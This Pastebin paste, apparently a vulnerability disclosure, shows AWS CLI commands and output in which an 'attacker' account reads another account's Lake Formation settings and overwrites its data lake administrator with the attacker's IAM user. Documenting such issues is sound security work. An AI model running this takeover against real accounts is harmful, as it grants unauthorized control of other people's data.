Advertisement
Guest User

Lake Formation Security Issue

a guest
Aug 9th, 2019
658
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JSON 1.94 KB | None | 0 0
  1. 111111111111 - Attacker account
  2. 222222222222 - Victim account
  3.  
  4. $ aws lakeformation get-data-lake-settings --catalog-id 222222222222 --region us-west-2
  5. {
  6.     "DataLakeSettings": {
  7.         "DataLakeAdmins": [
  8.             {
  9.                 "DataLakePrincipalIdentifier": "arn:aws:iam::222222222222:user/VictimAdmin"
  10.             }
  11.         ],
  12.         "CreateDatabaseDefaultPermissions": [
  13.             {
  14.                 "Principal": {
  15.                     "DataLakePrincipalIdentifier": "EVERYONE"
  16.                 },
  17.                 "Permissions": [
  18.                     "ALL"
  19.                 ]
  20.             }
  21.         ],
  22.         "CreateTableDefaultPermissions": [
  23.             {
  24.                 "Principal": {
  25.                     "DataLakePrincipalIdentifier": "EVERYONE"
  26.                 },
  27.                 "Permissions": [
  28.                     "ALL"
  29.                 ]
  30.             }
  31.         ]
  32.     }
  33. }
  34.  
  35. $ aws lakeformation put-data-lake-settings --catalog-id 222222222222 --data-lake-settings '{"DataLakeAdmins": [{"DataLakePrincipalIdentifier": "arn:aws:iam::111111111111:user/Attacker"}]}' --region us-west-2
  36.  
  37. $ aws lakeformation get-data-lake-settings --catalog-id 222222222222 --region us-west-2
  38. {
  39.     "DataLakeSettings": {
  40.         "DataLakeAdmins": [
  41.             {
  42.                 "DataLakePrincipalIdentifier": "arn:aws:iam::111111111111:user/Attacker"
  43.             }
  44.         ],
  45.         "CreateDatabaseDefaultPermissions": [
  46.             {
  47.                 "Principal": {
  48.                     "DataLakePrincipalIdentifier": "EVERYONE"
  49.                 },
  50.                 "Permissions": [
  51.                     "ALL"
  52.                 ]
  53.             }
  54.         ],
  55.         "CreateTableDefaultPermissions": [
  56.             {
  57.                 "Principal": {
  58.                     "DataLakePrincipalIdentifier": "EVERYONE"
  59.                 },
  60.                 "Permissions": [
  61.                     "ALL"
  62.                 ]
  63.             }
  64.         ]
  65.     }
  66. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement